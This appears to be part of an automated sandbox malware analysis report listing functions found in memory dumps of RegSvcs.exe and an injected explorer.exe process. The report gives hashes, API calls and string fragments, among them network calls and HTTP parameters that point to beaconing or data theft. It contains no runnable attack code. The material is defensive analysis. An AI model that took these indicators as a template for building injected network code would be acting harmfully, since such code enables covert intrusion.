Function 016339B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52daeb13def63f10326cb494990f68ec4bd1d53a38459b8c4d7298fed5fbfa9f
Instruction ID: b36b04278b39c1d1c21e6b75f08c4c4a17e818c67b1499fada5f41c288ef3517
Opcode Fuzzy Hash: 52daeb13def63f10326cb494990f68ec4bd1d53a38459b8c4d7298fed5fbfa9f
Instruction Fuzzy Hash: 7990022124545103D250759C48046174009B7E0201F55C021A4814694EC59589956321

Uniqueness

Uniqueness Score: -1.00%

Function 01633D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a1f201a060dba058de1b05b485486079e452bf96b3f9b76ee50884468fc74b
Instruction ID: 924b1e8051600a913969dffb311fcecd2f6e3457a3ff636b75396be6b0b3617b
Opcode Fuzzy Hash: 01a1f201a060dba058de1b05b485486079e452bf96b3f9b76ee50884468fc74b
Instruction Fuzzy Hash: EC90023520140403D61075985C04647004A97D0301F55D411A4424658EC69489E1A221

Uniqueness

Uniqueness Score: -1.00%

Function 01633D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6ee9652aa7bdb6038868273b37ef4198f75817bbf4920b8d5bd3d79ad72700
Instruction ID: f250ac042369eec8895ff9f61c1ec424d16ec13fa5f55da4a26b40dac09cd760
Opcode Fuzzy Hash: 9a6ee9652aa7bdb6038868273b37ef4198f75817bbf4920b8d5bd3d79ad72700
Instruction Fuzzy Hash: 6B90023120240143964076985C04A4F410997E1302B95D415A4015654DC95489A15321

Uniqueness

Uniqueness Score: -1.00%

Function 01632C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 5aad6a5a0420ab2d68b7750ed78af570640d08ea2e24e835ce1487a5eb418be2
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01632890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0163293C
___swprintf_l.LIBCMT ref: 0163295E
___swprintf_l.LIBCMT ref: 016329A3
___swprintf_l.LIBCMT ref: 0166A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0166A54E
:%u.%u.%u.%u, xrefs: 0166A5B8
::%hs%u.%u.%u.%u, xrefs: 0166A527
ffff:, xrefs: 0166A504

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1aba9ae6aa5d2e964878af58bd76a771ab25f1aab71566aba6e19fc8ce2c930f
Instruction ID: 0aaa880ee2cde90e4d1255e709a52822cc796580fb53525df5decce7bc9cba8e
Opcode Fuzzy Hash: 1aba9ae6aa5d2e964878af58bd76a771ab25f1aab71566aba6e19fc8ce2c930f
Instruction Fuzzy Hash: BD51D4B6A00116BFCB11DF9D8CA097EFBB8BB88640714826DE5A5D7641E334DE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 016A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016A24A6
___swprintf_l.LIBCMT ref: 016A24E2
___swprintf_l.LIBCMT ref: 016A257D
___swprintf_l.LIBCMT ref: 016A25A3
___swprintf_l.LIBCMT ref: 016A25C8
___swprintf_l.LIBCMT ref: 016A2608

Strings

:%u.%u.%u.%u, xrefs: 016A25FF
::%hs%u.%u.%u.%u, xrefs: 016A249E
ffff:, xrefs: 016A247D, 016A249D
::ffff:0:%u.%u.%u.%u, xrefs: 016A24DA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b0a76a678effabc4bdc199ff0c94146e83a330c7e45ef3674ca26f2150e9905e
Instruction ID: 32d928c04fddae72433cdbfed9678f507b985808c9ee93ba6f2ec69e28fae5a6
Opcode Fuzzy Hash: b0a76a678effabc4bdc199ff0c94146e83a330c7e45ef3674ca26f2150e9905e
Instruction Fuzzy Hash: D1510371A44656AFCB24DF9CCCA09BEBBF9FB44200B84846DE5D6C7641E774EE408B60

Uniqueness

Uniqueness Score: -1.00%

Function 01627630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01664742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01664725
CLIENT(ntdll): Processing section info %ws..., xrefs: 01664787
Execute=1, xrefs: 01664713
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016646FC
ExecuteOptions, xrefs: 016646A0
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01664655

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1eae1e115fcbd6360824e018cb238b311cffd89ee5ed241d228e68568a587804
Instruction ID: e1f539a78930d9cbac98efe2f206c7482650624d3d857c0f6ee7f41b691cfcb2
Opcode Fuzzy Hash: 1eae1e115fcbd6360824e018cb238b311cffd89ee5ed241d228e68568a587804
Instruction Fuzzy Hash: 89511A3160062A7AEF31EBA8DC85FB977A9FF24300F14009DD605AB2D1DB719E458F54

Uniqueness

Uniqueness Score: -1.00%

Function 016C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 5b187bca2554b1315ea1f0e009d55b6448c11b9c3f33ffc7ad80f5cdd8be9b42
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 0C022771508342AFD305CF28C894A6BBBE6EFD8B14F44892DF9858B364DB31E905CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0163B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0163B6BF

Strings

0, xrefs: 0163B695
0, xrefs: 0163B66F
-, xrefs: 0163B650
+, xrefs: 0163B65A

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 57ce6e47105ae8660f22394bbea31dfcd0d49ecd0da16cccd044ea324f930c6f
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: C081A070E052599EEF268E6CCC917FEBBB2EFC6320F1C415AD861A7392C73498418B55

Uniqueness

Uniqueness Score: -1.00%

Function 016A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016A214F
___swprintf_l.LIBCMT ref: 016A2172

Strings

%%%u, xrefs: 016A2146
[, xrefs: 016A212B
]:%u, xrefs: 016A2169

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 7c4de682173f3635c1bf7b3e71eee7e34ee58eef108d0aa025003527302614df
Instruction ID: 5d18a6da724fa743b90d149e15edfd3fbf3e15f23237b374f76cb41211856a8d
Opcode Fuzzy Hash: 7c4de682173f3635c1bf7b3e71eee7e34ee58eef108d0aa025003527302614df
Instruction Fuzzy Hash: 8821657AE00119ABDB10DF79CC50AEEBBF9EF54641F44011EEA05D3240E730EE158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0161F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0166031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016602E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016602BD

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 1238f97cad941b574920752632f3ba4d9f2fc6b5c39bbe52e5a50ec3a4f8550f
Instruction ID: ae48281a2d15bf3bf2e3a1143695dc3c2fe19a60ca7e830a7c15e4f786b8f1d7
Opcode Fuzzy Hash: 1238f97cad941b574920752632f3ba4d9f2fc6b5c39bbe52e5a50ec3a4f8550f
Instruction Fuzzy Hash: F2E18B706087429FD725CF28CC84B2ABBE5AF84314F184AADF5A58B3E1D774D949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0162BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01667BAC
RTL: Resource at %p, xrefs: 01667B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01667B7F

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 13895626bd436daf977b88b5f1cff9b013f86cf4756e352e7a40657c71b419a7
Instruction ID: 2b43be6210ff77fb09c14c7df684483b10bb2ca9f4a588cbbf90cf1f93be5aa9
Opcode Fuzzy Hash: 13895626bd436daf977b88b5f1cff9b013f86cf4756e352e7a40657c71b419a7
Instruction Fuzzy Hash: C341B031705B029FD720DE2DCC40F6AB7E5EB98720F100A1DE9AA9B780DB71E9058F95

Uniqueness

Uniqueness Score: -1.00%

Function 0162B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0166728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01667294
RTL: Re-Waiting, xrefs: 016672C1
RTL: Resource at %p, xrefs: 016672A3

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: ae9cf13940f94b9a51013309d6afdc5edb2363f275c29957dc6230421134d8b8
Instruction ID: 3fe4ffe1919456cfb9d646c1e167e3680fc1975e088eaf9172eb1096c68d44fb
Opcode Fuzzy Hash: ae9cf13940f94b9a51013309d6afdc5edb2363f275c29957dc6230421134d8b8
Instruction Fuzzy Hash: FF412031701616ABD720DE69CC81F6AB7AAFF94714F10461DFD55AB340DB20F8428BD1

Uniqueness

Uniqueness Score: -1.00%

Function 016A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016A238D
___swprintf_l.LIBCMT ref: 016A23B3

Strings

]:%u, xrefs: 016A23AA
%%%u, xrefs: 016A2384

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 0c4a2b22f55de63421301884549bbffc5ad22c081b0d21242ccfd2fc09883d44
Instruction ID: 1a9076139e523ecf41e19969749d0dce0cd86d53a93c82908daed3b7b6d24d97
Opcode Fuzzy Hash: 0c4a2b22f55de63421301884549bbffc5ad22c081b0d21242ccfd2fc09883d44
Instruction Fuzzy Hash: 2C318472A002299FDB24DE2DCC50BEEB7F9EF45610F84055DE949E7240EB309E548FA0

Uniqueness

Uniqueness Score: -1.00%

Function 01637D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01637E8B

Strings

+, xrefs: 01637DE8
-, xrefs: 01637DDD

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: f8425a9bdf600bed6e08fc8d8d0cf0a656916d19e56a91c63fb95928803c6133
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 969160B1E0021A9AEB24DF6DCC816BEBBA5FFC4720F14461EE955A73C0D7309941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 015F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 015F9191
@, xrefs: 015F9175

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 7403c41bccc6138bc736f75748f51873fb073e590bcf461a30eabcc8964a1b44
Instruction ID: d8ac35a393a30bd4bb4533bcdd4021acb5002bba433b009968afd9d9fdb05694
Opcode Fuzzy Hash: 7403c41bccc6138bc736f75748f51873fb073e590bcf461a30eabcc8964a1b44
Instruction Fuzzy Hash: 9A811971D00669DBDB35CB54CC54BEEBBB5AB48714F0441EEAA09B7280D7709E84CFA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 2580, Parent PID: 3848COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 0F4E7F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0F4E812E
setsockopt.WS2_32 ref: 0F4E8830
recv.WS2_32 ref: 0F4E8859

Strings

&br=, xrefs: 0F4E8509
nnec, xrefs: 0F4E832A
dat=, xrefs: 0F4E8290
&sql, xrefs: 0F4E8471
tion, xrefs: 0F4E8331
Co, xrefs: 0F4E8323
&un=, xrefs: 0F4E84F1
: cl, xrefs: 0F4E8338
ose, xrefs: 0F4E833F
GET , xrefs: 0F4E8318

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: c095dfc7d6a8c4db9d942fc76b64e9e16cc31a444eb0b68db17ede20302dd1d8
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 05526F30614B088FDB69EF68C4847EAB7E1FB54301F504A6ED89BDB247DE34A549C781

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E7232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0F4E7449

Strings

`, xrefs: 0F4E741D

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 4abbc138ceb2447f1c9d2faee3f7cc3166df3881072b9ad4da39062493b873c9
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 7C224C70A18B099FCB99DF28C4956AEF7E1FF58311F80062EE86ED7651DB30A451CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E8E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0F4E8E67

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 33a0ad5a203151bc4c8235c6816d8ed762cf9ce8c4a0e4c87e71813353ff8e69
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 35019E30668B484F9B88EF6C948012AB7E4FBD9215F000B3EE99AC3254EB74C5414742

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E8E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0F4E8E67

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: d188f1cb6d5ff5e592d5d26bf85c3f4b70e1d396b75d9999e1d3ebdb34ccc2b0
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: B201A234628B884B8B48EB3C94412A6B3E5FBCE315F000B3EE9DAC3245EB35D5024782

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E28C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0F4E29A0

Strings

urlmon.dll, xrefs: 0F4E2959
on.d, xrefs: 0F4E2902
nt: , xrefs: 0F4E291E
User-Agent: , xrefs: 0F4E2935, 0F4E2948

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 413361100c372f047fff0f24a89d6307a117ae616490cc623c711284542974e3
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 1831AE31A14B0C8FCB44EFA9C8847EEB7E1FB58215F40462BD85ED7241DE7886498789

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E28BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0F4E29A0

Strings

urlmon.dll, xrefs: 0F4E2959
on.d, xrefs: 0F4E2902
nt: , xrefs: 0F4E291E
User-Agent: , xrefs: 0F4E2935, 0F4E2948

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: de6c29c0356a03758044ace76e7dee6ca942ce8e3f5a2b310a9038a1d81423f6
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 1821C330A10B0C8ECF04EFA9C8947EE7BA4FF58205F40421FD85AD7241DE7886058789

Uniqueness

Uniqueness Score: -1.00%

Function 0F4DEB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0F4DECCA

Strings

kern, xrefs: 0F4DEB99
.dll, xrefs: 0F4DEBCD
el32, xrefs: 0F4DEBA0

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: c5cb71a066faea2ee58a8208e34804f1b8177590873797e3255f2bd263da491b
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 2F415A70918A088FDB54EFA8C8D4BAD77E0FF68301F44417ADC4EDB256EA349945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F4DEB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0F4DECCA

Strings

kern, xrefs: 0F4DEB99
.dll, xrefs: 0F4DEBCD
el32, xrefs: 0F4DEBA0

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: bd9d81114b704093445bb50c094fe5ab4a75adffa807ff61f938731469acba17
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 63413870918A088FDB98EFA8C498BAD77E0FB68301F44417AD84EDB256DA349945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E472E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0F4E4791

Strings

ect, xrefs: 0F4E4761
conn, xrefs: 0F4E475A

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 28da5168b4abe333822139500009b61f9571b72fe5e87142a878ba82e7e7bbbf
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: A9015E30618B188FCB84EF1CE088B55B7E0FB59325F1545AED90DCB226C674D8818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E4732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0F4E4791

Strings

ect, xrefs: 0F4E4761
conn, xrefs: 0F4E475A

Memory Dump Source

Source File: 00000007.00000002.2885332691.000000000F4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f4a0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 42b38db440defc97410160279bedc30bfa8b70a2567d1c120334b00d6ed3a276
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: D5012170618A1C8FCB84EF5CE088B5577E0FB59325F1541AE980DCB226C674C9818BC2

Uniqueness

Uniqueness Score: -1.00%

